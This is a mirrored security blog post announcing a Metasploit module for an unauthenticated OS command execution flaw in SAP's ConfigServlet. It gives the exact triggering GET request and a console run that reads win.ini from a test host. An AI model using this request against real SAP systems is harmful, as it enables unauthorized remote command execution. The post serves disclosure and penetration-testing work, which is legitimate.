Mirrored from my previous site, original URL was: http://blog.kabaiandras.hu/2013/04/sap-configservlet-os-command-execution.html
If you ever tried to search for SAP vulnerabilities then I am sure you met some form of ERPScan’s team awesome researches. This happened in our current pentest project as well. A colleague of mine identified several SAP systems in the target network range and we tried to find well known vulnerabilities for them.
We found a great presentation (Breaking SAP Portal) from Hacker Halted 2012 by Dmitry Chastuchin from ERPScan. One of the slides contains a very interesting screenshot about an exploitation of a simple, remote, authentication less OS command execution vulnerability. Yes, with a simple GET request it is possible to execute OS commands on the remote system. I tried to search for existing exploit implementations for this vulnerability but there were no public metasploit or other exploits available. Surprisingly not just exploits were not available but there were no relevant search results to this vulnerability so I decided to create a metasploit module for that.
The vulnerability exists in the /ctc/servlet/ConfigServlet servlet, where with the proper parameters you can achieve OS command execution.
To trigger the vulnerability you only have to request something like this:
GET /ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=whoami
And the servlet will happily execute your commands from CMDLINE parameter and pass its output to the generated HTTP response. However, there are vendor patches for this vulnerability, you know how frequently companies apply them, so you have good chance to find a vulnerable version and exploit this vulnerability successfully.
It was easy to implement this exploit in metasploit. You can see my module in action:
msf auxiliary(sap_configservlet_exec_noauth) > show options Module options (auxiliary/admin/sap/sap_configservlet_exec_noauth): Name Current Setting Required Description ---- --------------- -------- ----------- CMD cmd /c type c:\windows\win.ini yes The command to execute Proxies no Use a proxy chain RHOST 10.1.10.100 yes The target address RPORT 50000 yes The target port TARGETURI /ctc/servlet yes Path to ConfigServlet VHOST no HTTP server virtual host msf auxiliary(sap_configservlet_exec_noauth) > run [*] 10.1.10.100:50000 - Sending remote command: cmd /c type c:\windows\win.ini [+] 10.1.10.100:50000 - Exploited successfully 10.1.10.100:50000 - Command: cmd /c type c:\windows\win.ini 10.1.10.100:50000 - Output: TYPE=S STATE= INFO_SHORT= + Process created! ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 <BR>CONFIGURATION= [*] Auxiliary module execution completed msf auxiliary(sap_configservlet_exec_noauth) >
As you can see the received output after the “Process created!” contains the output of the executed command.
Check the updates section in this post to access the code and to follow the life of my module.
[Updates]
- Metasploit pull requests
https://github.com/rapid7/metasploit-framework/pull/1740
https://github.com/rapid7/metasploit-framework/pull/1751 - Exploit-DB
http://www.exploit-db.com/exploits/24963/ - Official metasploit information
http://www.metasploit.com/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth - Code in metasploit’s master branch
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb - Actual weekly news from Rapid7 about new modules, including my auxiliary/admin/sap/sap_configservlet_exec_noauth module as well
https://community.rapid7.com/community/metasploit/blog/2013/05/02/weekly-update
Dangerous Payload 
One thought on “SAP ConfigServlet OS command execution metasploit module”